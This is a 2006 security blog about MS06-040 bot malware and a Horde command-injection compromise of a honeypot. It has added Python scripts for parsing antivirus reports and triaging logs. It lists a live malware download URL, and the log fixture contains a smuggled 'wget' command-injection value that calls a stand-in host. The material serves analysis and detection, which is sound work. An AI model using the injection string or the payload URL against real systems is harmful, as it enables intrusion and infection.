MS06-040 Update

Tuesday, August 15. 2006
Yesterday I blogged about the recent MS06-040 vulnerability and the malware related to it. As noted by Tom Fischer, the bot-herders also install additional software on the infected machines. They issue a download for http://media.pixpond.com/l9rXXX.jpg (MD5 9bc2f9e15a4802fe5be55a0510f2f0e3 at the time of this writing), which is classified by different AV engines as

AntiVir:
---------

Signature Update: 2006-08-13 15:40:06
Product Version: 2.1.7-31
Signature Version: 6.35.1.85
Result: Trojan/Dldr.Bary.FL.2

Signature Update: 2006-08-14 09:40:05
Product Version: 2.1.7-31
Signature Version: 6.35.1.87
Result: Trojan/Proxy.FV

BitDefender:
--------------

Signature Update: 2006-08-14 00:40:06
Product Version: 7.0.2492
Signature Version: 444432
Result: Backdoor.Proxy.Piky.B

ClamAV:
---------

Signature Update: 2006-08-13 21:40:05
Product Version: 0.88.2
Signature Version: 1655
Result: Trojan.Proxy.Ranky-29


There is also an analysis of this binary from our sandbox (and in XML).
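Detection names for the same sample differ from vendor to vendor and, as the two AntiVir entries above show, can change from one signature update to the next, so a hash is the only stable handle on the file. The following script is an added example (not code from the original post): it parses the plain-text report layout used above into structured records, reports the most recent name per vendor and any renames, and checks a file's MD5 against the hash given in the post. The report text is copied from the post; the sample bytes fed to the hash check are constructed.

```python
"""Parse the multi-vendor AV report from the post and check a sample's MD5.

Added example, not from the original post. REPORT is the post's text in the
post's own layout; SAMPLE is constructed and will not match the hash.
"""
import hashlib
import re
from collections import defaultdict

# MD5 published in the post for the downloaded second-stage binary.
KNOWN_MD5 = "9bc2f9e15a4802fe5be55a0510f2f0e3"

# Report in the post's layout: vendor header, dashed underline, then
# key/value blocks separated by blank lines.
REPORT = """\
AntiVir:
---------

Signature Update: 2006-08-13 15:40:06
Product Version: 2.1.7-31
Signature Version: 6.35.1.85
Result: Trojan/Dldr.Bary.FL.2

Signature Update: 2006-08-14 09:40:05
Product Version: 2.1.7-31
Signature Version: 6.35.1.87
Result: Trojan/Proxy.FV

BitDefender:
--------------

Signature Update: 2006-08-14 00:40:06
Product Version: 7.0.2492
Signature Version: 444432
Result: Backdoor.Proxy.Piky.B

ClamAV:
---------

Signature Update: 2006-08-13 21:40:05
Product Version: 0.88.2
Signature Version: 1655
Result: Trojan.Proxy.Ranky-29
"""

VENDOR_RE = re.compile(r"^(\S+):\s*$")          # e.g. "AntiVir:"
KV_RE = re.compile(r"^([A-Za-z ]+):\s*(.+?)\s*$")  # e.g. "Result: Trojan/Proxy.FV"


def parse_report(text):
    """Return {vendor: [ {field: value, ...}, ... ]} in report order."""
    vendors = defaultdict(list)
    vendor, block = None, {}
    for line in text.splitlines():
        stripped = line.strip()
        # Blank lines and dashed underlines end the current block.
        if not stripped or set(stripped) == {"-"}:
            if block:
                vendors[vendor].append(block)
                block = {}
            continue
        m = VENDOR_RE.match(line)
        if m:
            vendor = m.group(1)
            continue
        m = KV_RE.match(line)
        if m and vendor is not None:
            block[m.group(1)] = m.group(2)
    if block:
        vendors[vendor].append(block)
    return dict(vendors)


def latest_names(vendors):
    """Most recent detection name per vendor (ISO timestamps sort as text)."""
    return {v: max(blocks, key=lambda b: b["Signature Update"])["Result"]
            for v, blocks in vendors.items()}


def renamed_detections(vendors):
    """Vendors whose detection name changed between signature updates."""
    return {v: [b["Result"] for b in blocks]
            for v, blocks in vendors.items()
            if len({b["Result"] for b in blocks}) > 1}


def md5_matches(data, expected=KNOWN_MD5):
    """True if the MD5 of `data` equals the published hash."""
    return hashlib.md5(data).hexdigest() == expected.lower()


if __name__ == "__main__":
    report = parse_report(REPORT)
    for vendor, name in latest_names(report).items():
        print(f"{vendor:12s} {name}")
    print("renamed:", renamed_detections(report))
    SAMPLE = b"constructed bytes, not the real binary"
    print("sample matches published MD5:", md5_matches(SAMPLE))
```

The hash is a point-in-time indicator: the post itself qualifies it with "at the time of this writing", and a file served from a URL under the attacker's control can be swapped at any moment, so a non-match on a freshly downloaded copy means "different file", not "clean".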

Update: LURHQ has also an update on Mocbot Spam Analysis.

Honeypot Compromises I

Tuesday, August 15. 2006
Some time ago I blogged about several compromises at our honeypots deployed in Germany. Now it is time for an update and a closer look at what happened during these incidents. Today we will take a closer look at the compromise of a Suse 9.1 honeypot with a vulnerable Horde Framework. The attacker installed several scripts on the honeypot and also tried to set up a phishing web site.

Motivation:
On May 5th 2006 our Suse 9.1-based honeypot was attacked and successfully compromised by exploiting a vulnerable web application, the Horde Application Framework. The vulnerability could be exploited by a remote attacker to execute arbitrary commands with the privileges of the running Apache webserver process. This flaw is due to an input validation error in the help viewer of the application. The vulnerability was first discovered in March 2006 and affects all Horde Application Framework versions prior to 3.1.1.
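Because the flaw is an input validation error that ends in command execution as the web server user, the first trace of an attempt is usually a request to the help viewer whose parameters carry shell metacharacters. The script below is an added example of that triage over Apache combined-format access logs; it is not part of the original analysis. The log lines are constructed, the help viewer path prefix and the parameter name are assumptions (adjust them to the real deployment), and the check is deliberately generic: it flags any watched-path parameter containing characters a help topic name never needs.

```python
"""Triage Apache access logs for command-injection attempts against a web
application's help viewer.  Added example; the log lines are constructed and
WATCHED_PREFIX is an assumed path, not taken from the original post.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed location of the help viewer; change to match the deployment.
WATCHED_PREFIX = "/horde/services/help/"

# Characters that have no business in a help-topic parameter but are
# needed to chain or redirect shell commands.
SHELL_META = re.compile(r"[;|&`$()<>\n]")

# Apache combined log format (request line split into method/target/protocol).
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: one benign help request, one injection attempt
# (";wget ..." URL-encoded in the query string), one unrelated request.
LOG = """\
203.0.113.7 - - [05/May/2006:03:12:41 +0200] "GET /horde/services/help/?page=topics HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
203.0.113.7 - - [05/May/2006:03:12:44 +0200] "GET /horde/services/help/?page=index%3Bwget+http%3A%2F%2Fexample.invalid%2Fx.pl HTTP/1.1" 200 912 "-" "Mozilla/4.0"
198.51.100.2 - - [05/May/2006:03:15:02 +0200] "GET /horde/index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl percent-decodes values once, so "%3B" becomes ";" here.
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def suspicious_params(rec):
    """Parameters of a help-viewer request that carry shell metacharacters."""
    if not rec["path"].startswith(WATCHED_PREFIX):
        return []
    return [(k, v) for k, v in rec["params"] if SHELL_META.search(v)]


def triage(log_text):
    """Return (ip, timestamp, [(param, decoded value), ...]) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_params(rec)
        if bad:
            hits.append((rec["ip"], rec["ts"], bad))
    return hits


if __name__ == "__main__":
    for ip, ts, params in triage(LOG):
        print(f"{ts} {ip} -> {params}")
```

Two caveats a practitioner would want: parameters sent in a POST body are not in the access log at all, so this only catches GET-style attempts, and a 200 status on the flagged line says nothing about whether the injection worked; the honeypot's own trace of new files and processes owned by the Apache user is what confirms a compromise.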

The full analysis was written by Jan Göbel during his thesis work.